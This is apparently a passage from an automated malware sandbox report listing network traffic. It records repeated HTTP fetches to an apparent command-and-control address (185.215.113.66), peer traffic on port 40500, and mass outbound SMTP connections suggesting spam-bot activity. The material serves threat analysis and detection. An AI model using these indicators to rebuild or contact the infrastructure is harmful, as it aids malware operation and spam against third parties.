                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66If-Modified-Since: Mon, 12 Dec 2022 17:05:27 GMTIf-None-Match: "63975f57-3700"
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /getntbup HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficTCP traffic: 192.168.2.3:49700 -> 76.105.84.120:40500
                              Source: global trafficTCP traffic: 192.168.2.3:50022 -> 111.95.202.239:40500
                              Source: global trafficTCP traffic: 192.168.2.3:50267 -> 201.111.237.231:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 94.233.62.176:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 100.70.71.70:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 185.194.125.197:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 94.228.28.169:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 89.36.50.53:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 217.219.3.174:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 93.170.211.108:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 5.236.176.37:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 85.185.51.236:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 109.125.129.49:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 5.74.89.49:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 2.183.251.32:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 151.245.32.111:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 213.230.109.3:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 100.84.27.254:40500
                              Source: global trafficUDP traffic: 192.168.2.3:62706 -> 2.189.180.190:40500
                              Source: unknownNetwork traffic detected: IP country count 18
                              Source: global trafficTCP traffic: 192.168.2.3:49702 -> 98.136.96.75:25
                              Source: global trafficTCP traffic: 192.168.2.3:49707 -> 27.32.32.49:25
                              Source: global trafficTCP traffic: 192.168.2.3:49708 -> 98.136.96.76:25
                              Source: global trafficTCP traffic: 192.168.2.3:49709 -> 67.195.228.109:25
                              Source: global trafficTCP traffic: 192.168.2.3:49710 -> 203.59.218.120:25
                              Source: global trafficTCP traffic: 192.168.2.3:49711 -> 188.165.138.210:25
                              Source: global trafficTCP traffic: 192.168.2.3:49712 -> 211.29.133.14:25
                              Source: global trafficTCP traffic: 192.168.2.3:49713 -> 212.27.48.7:25
                              Source: global trafficTCP traffic: 192.168.2.3:49714 -> 104.47.71.202:25
                              Source: global trafficTCP traffic: 192.168.2.3:49715 -> 104.47.71.138:25
                              Source: global trafficTCP traffic: 192.168.2.3:49717 -> 203.210.102.55:25
                              Source: global trafficTCP traffic: 192.168.2.3:49718 -> 91.220.42.241:25
                              Source: global trafficTCP traffic: 192.168.2.3:49720 -> 203.134.71.81:25
                              Source: global trafficTCP traffic: 192.168.2.3:49724 -> 103.13.69.122:25
                              Source: global trafficTCP traffic: 192.168.2.3:49727 -> 67.195.204.73:25
                              Source: global trafficTCP traffic: 192.168.2.3:49728 -> 203.36.172.106:25
                              Source: global trafficTCP traffic: 192.168.2.3:49729 -> 185.183.28.184:25
                              Source: global trafficTCP traffic: 192.168.2.3:49730 -> 98.136.96.77:25
                              Source: global trafficTCP traffic: 192.168.2.3:49739 -> 13.238.202.140:25
                              Source: global trafficTCP traffic: 192.168.2.3:49740 -> 124.47.150.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:49741 -> 142.250.153.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:49742 -> 203.39.128.78:25
                              Source: global trafficTCP traffic: 192.168.2.3:49744 -> 27.32.32.10:25
                              Source: global trafficTCP traffic: 192.168.2.3:49746 -> 203.134.71.161:25
                              Source: global trafficTCP traffic: 192.168.2.3:49747 -> 203.29.125.6:25
                              Source: global trafficTCP traffic: 192.168.2.3:49749 -> 67.195.204.79:25
                              Source: global trafficTCP traffic: 192.168.2.3:49752 -> 112.140.176.121:25
                              Source: global trafficTCP traffic: 192.168.2.3:49753 -> 203.29.125.68:25
                              Source: global trafficTCP traffic: 192.168.2.3:49754 -> 98.136.96.74:25
                              Source: global trafficTCP traffic: 192.168.2.3:49762 -> 142.251.31.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:49765 -> 173.254.28.81:25
                              Source: global trafficTCP traffic: 192.168.2.3:49767 -> 98.136.96.91:25
                              Source: global trafficTCP traffic: 192.168.2.3:49772 -> 17.57.156.24:25
                              Source: global trafficTCP traffic: 192.168.2.3:49774 -> 182.160.153.182:25
                              Source: global trafficTCP traffic: 192.168.2.3:49775 -> 149.13.75.27:25
                              Source: global trafficTCP traffic: 192.168.2.3:49776 -> 209.41.68.125:25
                              Source: global trafficTCP traffic: 192.168.2.3:49781 -> 116.250.254.131:25
                              Source: global trafficTCP traffic: 192.168.2.3:49784 -> 67.195.204.77:25
                              Source: global trafficTCP traffic: 192.168.2.3:49786 -> 203.36.137.234:25
                              Source: global trafficTCP traffic: 192.168.2.3:49787 -> 203.10.1.146:25
                              Source: global trafficTCP traffic: 192.168.2.3:49799 -> 61.88.105.36:25
                              Source: global trafficTCP traffic: 192.168.2.3:49803 -> 74.125.200.27:25
                              Source: global trafficTCP traffic: 192.168.2.3:49805 -> 209.41.68.146:25
                              Source: global trafficTCP traffic: 192.168.2.3:49806 -> 67.195.228.94:25
                              Source: global trafficTCP traffic: 192.168.2.3:49808 -> 27.86.106.73:25
                              Source: global trafficTCP traffic: 192.168.2.3:49810 -> 104.47.20.36:25
                              Source: global trafficTCP traffic: 192.168.2.3:49811 -> 23.90.107.55:25
                              Source: global trafficTCP traffic: 192.168.2.3:49822 -> 202.22.162.67:25
                              Source: global trafficTCP traffic: 192.168.2.3:49824 -> 67.195.228.110:25
                              Source: global trafficTCP traffic: 192.168.2.3:49825 -> 67.195.204.74:25
                              Source: global trafficTCP traffic: 192.168.2.3:49829 -> 203.18.20.3:25
                              Source: global trafficTCP traffic: 192.168.2.3:49832 -> 211.29.132.250:25
                              Source: global trafficTCP traffic: 192.168.2.3:49835 -> 142.251.8.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:49838 -> 111.223.235.7:25
                              Source: global trafficTCP traffic: 192.168.2.3:49840 -> 67.195.204.72:25
                              Source: global trafficTCP traffic: 192.168.2.3:49843 -> 3.24.133.210:25
                              Source: global trafficTCP traffic: 192.168.2.3:49845 -> 208.84.65.130:25
                              Source: global trafficTCP traffic: 192.168.2.3:49848 -> 103.13.69.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:49852 -> 121.200.0.59:25
                              Source: global trafficTCP traffic: 192.168.2.3:49855 -> 205.139.110.242:25
                              Source: global trafficTCP traffic: 192.168.2.3:49860 -> 150.229.7.40:25
                              Source: global trafficTCP traffic: 192.168.2.3:49866 -> 173.194.202.27:25
                              Source: global trafficTCP traffic: 192.168.2.3:49874 -> 165.86.71.114:25
                              Source: global trafficTCP traffic: 192.168.2.3:49892 -> 216.40.42.4:25
                              Source: global trafficTCP traffic: 192.168.2.3:49893 -> 67.195.228.106:25
                              Source: global trafficTCP traffic: 192.168.2.3:49896 -> 155.207.1.1:25
                              Source: global trafficTCP traffic: 192.168.2.3:49901 -> 104.47.73.138:25
                              Source: global trafficTCP traffic: 192.168.2.3:49908 -> 185.132.182.171:25
                              Source: global trafficTCP traffic: 192.168.2.3:49910 -> 91.207.212.222:25
                              Source: global trafficTCP traffic: 192.168.2.3:49914 -> 18.185.115.251:25
                              Source: global trafficTCP traffic: 192.168.2.3:49915 -> 142.251.8.27:25
                              Source: global trafficTCP traffic: 192.168.2.3:49925 -> 20.92.134.58:25
                              Source: global trafficTCP traffic: 192.168.2.3:49929 -> 203.134.22.24:25
                              Source: global trafficTCP traffic: 192.168.2.3:49937 -> 27.32.28.130:25
                              Source: global trafficTCP traffic: 192.168.2.3:49941 -> 199.188.200.230:25
                              Source: global trafficTCP traffic: 192.168.2.3:49945 -> 104.47.64.110:25
                              Source: global trafficTCP traffic: 192.168.2.3:49951 -> 165.12.244.5:25
                              Source: global trafficTCP traffic: 192.168.2.3:49953 -> 49.0.10.212:25
                              Source: global trafficTCP traffic: 192.168.2.3:49956 -> 139.138.31.123:25
                              Source: global trafficTCP traffic: 192.168.2.3:49960 -> 202.124.68.52:25
                              Source: global trafficTCP traffic: 192.168.2.3:49962 -> 209.222.82.255:25
                              Source: global trafficTCP traffic: 192.168.2.3:49971 -> 142.250.150.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:49977 -> 203.134.153.161:25
                              Source: global trafficTCP traffic: 192.168.2.3:49991 -> 103.224.212.34:25
                              Source: global trafficTCP traffic: 192.168.2.3:49995 -> 203.6.68.1:25
                              Source: global trafficTCP traffic: 192.168.2.3:50001 -> 74.125.200.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:50003 -> 217.69.139.150:25
                              Source: global trafficTCP traffic: 192.168.2.3:50009 -> 101.0.80.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:50043 -> 203.0.178.173:25
                              Source: global trafficTCP traffic: 192.168.2.3:50047 -> 203.17.235.1:25
                              Source: global trafficTCP traffic: 192.168.2.3:50048 -> 143.95.39.218:25
                              Source: global trafficTCP traffic: 192.168.2.3:50054 -> 116.50.58.190:25
                              Source: global trafficTCP traffic: 192.168.2.3:50063 -> 144.53.192.125:25
                              Source: global trafficTCP traffic: 192.168.2.3:50069 -> 103.252.153.16:25
                              Source: global trafficTCP traffic: 192.168.2.3:50070 -> 72.35.12.4:25
                              Source: global trafficTCP traffic: 192.168.2.3:50080 -> 203.210.102.35:25
                              Source: global trafficTCP traffic: 192.168.2.3:50092 -> 3.24.133.209:25
                              Source: global trafficTCP traffic: 192.168.2.3:50094 -> 13.70.186.218:25
                              Source: global trafficTCP traffic: 192.168.2.3:50100 -> 212.227.15.17:25
                              Source: global trafficTCP traffic: 192.168.2.3:50120 -> 66.111.4.70:25
                              Source: global trafficTCP traffic: 192.168.2.3:50132 -> 52.62.125.178:25
                              Source: global trafficTCP traffic: 192.168.2.3:50135 -> 125.63.146.250:25
                              Source: global trafficTCP traffic: 192.168.2.3:50144 -> 185.132.180.25:25
                              Source: global trafficTCP traffic: 192.168.2.3:50156 -> 221.121.138.114:25
                              Source: global trafficTCP traffic: 192.168.2.3:50166 -> 103.42.110.229:25
                              Source: global trafficTCP traffic: 192.168.2.3:50177 -> 203.30.68.68:25
                              Source: global trafficTCP traffic: 192.168.2.3:50182 -> 173.194.202.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:50199 -> 104.47.66.10:25
                              Source: global trafficTCP traffic: 192.168.2.3:50202 -> 59.100.172.130:25
                              Source: global trafficTCP traffic: 192.168.2.3:50205 -> 58.162.22.25:25
                              Source: global trafficTCP traffic: 192.168.2.3:50210 -> 203.208.88.30:25
                              Source: global trafficTCP traffic: 192.168.2.3:50215 -> 202.126.100.156:25
                              Source: global trafficTCP traffic: 192.168.2.3:50218 -> 3.104.195.181:25
                              Source: global trafficTCP traffic: 192.168.2.3:50220 -> 137.219.20.34:25
                              Source: global trafficTCP traffic: 192.168.2.3:50234 -> 205.220.182.206:25
                              Source: global trafficTCP traffic: 192.168.2.3:50241 -> 68.232.152.197:25
                              Source: global trafficTCP traffic: 192.168.2.3:50244 -> 108.177.119.27:25
                              Source: global trafficTCP traffic: 192.168.2.3:50254 -> 54.69.120.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:50271 -> 108.177.119.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:50274 -> 68.232.151.171:25
                              Source: global trafficTCP traffic: 192.168.2.3:50275 -> 3.123.5.6:25
                              Source: global trafficTCP traffic: 192.168.2.3:50278 -> 67.195.228.111:25
                              Source: global trafficTCP traffic: 192.168.2.3:50291 -> 43.250.142.232:25
                              Source: global trafficTCP traffic: 192.168.2.3:50307 -> 142.250.150.27:25
                              Source: global trafficTCP traffic: 192.168.2.3:50313 -> 144.76.72.62:25
                              Source: global trafficTCP traffic: 192.168.2.3:50315 -> 203.174.129.14:25
                              Source: global trafficTCP traffic: 192.168.2.3:50317 -> 117.120.13.136:25
                              Source: global trafficTCP traffic: 192.168.2.3:50319 -> 43.255.139.44:25
                              Source: global trafficTCP traffic: 192.168.2.3:50322 -> 67.219.250.217:25
                              Source: global trafficTCP traffic: 192.168.2.3:50335 -> 108.177.126.26:25
                              Source: global trafficTCP traffic: 192.168.2.3:50347 -> 184.106.54.1:25
                              Source: global trafficTCP traffic: 192.168.2.3:50353 -> 130.117.53.188:25
                              Source: global trafficTCP traffic: 192.168.2.3:50365 -> 69.60.120.224:25
                              Source: global trafficTCP traffic: 192.168.2.3:50366 -> 103.68.165.70:25
                              Source: global trafficTCP traffic: 192.168.2.3:50378 -> 139.138.29.119:25
                              Source: global trafficTCP traffic: 192.168.2.3:50379 -> 203.14.230.18:25
                              Source: global trafficTCP traffic: 192.168.2.3:50386 -> 67.231.154.162:25
                              Source: global trafficTCP traffic: 192.168.2.3:50391 -> 54.66.10.162:25
                              Source: global trafficTCP traffic: 192.168.2.3:50393 -> 124.47.150.122:25
                              Source: global trafficTCP traffic: 192.168.2.3:50396 -> 138.197.213.185:25
                              Source: global trafficTCP traffic: 192.168.2.3:50398 -> 130.117.54.106:25
                              Source: global trafficTCP traffic: 192.168.2.3:50416 -> 52.207.128.88:25
                              Source: global trafficTCP traffic: 192.168.2.3:50421 -> 104.47.0.36:25
                              Source: global trafficTCP traffic: 192.168.2.3:50427 -> 67.219.250.221:25
                              Source: global trafficTCP traffic: 192.168.2.3:50429 -> 203.170.86.233:25
                              Source: global trafficTCP traffic: 192.168.2.3:50432 -> 45.56.220.103:25
                              Source: global trafficTCP traffic: 192.168.2.3:50460 -> 3.24.133.211:25
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:53:58 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:01 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 12 Dec 2022 17:54:03 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and 